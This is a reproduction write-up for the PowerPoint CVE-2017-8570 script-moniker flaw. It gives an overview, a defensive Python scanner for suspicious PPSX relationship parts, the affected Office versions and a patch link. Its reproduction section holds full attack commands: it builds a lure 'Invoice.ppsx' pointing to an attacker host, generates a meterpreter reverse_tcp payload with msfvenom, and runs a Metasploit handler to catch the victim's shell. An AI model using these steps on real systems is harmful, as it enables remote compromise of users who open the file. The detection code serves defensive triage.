
CVE-2017-8570 reproduction

0x01 Overview

In July 2017, Microsoft fixed multiple Microsoft Office vulnerabilities, including CVE-2017-8570. It is a logic vulnerability rather than a memory-corruption bug, so it is simple and reliable to trigger, and it allows remote code execution in Microsoft Office.
The root cause is that Microsoft PowerPoint initializes the "script" Moniker object when the file is opened; the object is then activated while a PowerPoint animation is played, and the referenced SCT (Windows Script Component) file is executed. An attacker can trick a user into opening a PowerPoint file that carries the vulnerability and thereby run code with the same privileges as the currently logged-on user.
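Because a PPSX is a ZIP container and the "script:" moniker is carried in a slide's relationship part, a defender can triage a suspicious file without opening it in PowerPoint. The following script is an added example written for this page, not part of the original post or of any toolkit it mentions: it builds constructed sample packages in memory and flags any relationship whose Target starts with the script: moniker prefix, plus any OLE object relationship that is marked external. The host name placeholder.invalid, the part names and both heuristics are assumptions made for the example.

```python
import io
import re
import zipfile

# Constructed relationship parts for the example (not taken from any real document).
# The first one carries the "script:" moniker the overview describes; the host is a placeholder.
SUSPICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="script:http://placeholder.invalid/logo.sct" TargetMode="External"/>'
    '</Relationships>'
)

# An OLE object loaded from a URL without the script: prefix (assumed heuristic, second check).
EXTERNAL_OLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId3" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="http://placeholder.invalid/logo.doc" TargetMode="External"/>'
    '</Relationships>'
)

# An ordinary slide that only references an embedded image.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
    'Target="../media/image1.png"/>'
    '</Relationships>'
)

REL_RE = re.compile(r"<Relationship\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def build_ppsx(rels_xml: str) -> bytes:
    """Build a minimal PPSX-like ZIP holding one slide relationship part (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("ppt/slides/slide1.xml", '<?xml version="1.0"?><p:sld/>')
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


def scan_ppsx(data: bytes) -> list:
    """Return one finding per suspicious relationship found in any *.rels part.

    Check 1: Target starts with the "script:" moniker prefix (the CVE-2017-8570 pattern).
    Check 2: an oleObject relationship with TargetMode="External" (object fetched from a URL).
    Both checks are heuristics chosen for this example, not an official detection rule.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            for element in REL_RE.findall(text):
                attrs = dict(ATTR_RE.findall(element))
                target = attrs.get("Target", "")
                rel_type = attrs.get("Type", "")
                external = attrs.get("TargetMode", "").lower() == "external"
                if target.lower().startswith("script:"):
                    findings.append({"part": name, "target": target, "reason": "script moniker"})
                elif rel_type.endswith("/oleObject") and external:
                    findings.append({"part": name, "target": target, "reason": "external OLE object"})
    return findings


if __name__ == "__main__":
    for label, rels in (("suspicious", SUSPICIOUS_RELS), ("external-ole", EXTERNAL_OLE_RELS), ("benign", BENIGN_RELS)):
        print(label, scan_ppsx(build_ppsx(rels)))
```

To use it on a real file, replace build_ppsx(...) with the bytes read from disk; the scanner never executes any part of the package, it only reads the relationship XML.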

0x02 Affected versions

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

0x03 Reproduction

Step1:
python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://attackerip/logo.doc
Step2:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe
Step3:
python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe
Step4:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp    // set the payload
set LHOST attackerip
run
Step5:
Double-click Invoice.ppsx on the victim machine and a Meterpreter session is returned to the handler.

0x04 Fix

Apply the patch from Microsoft: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

0x05 Reference

http://www.ichunqiu.com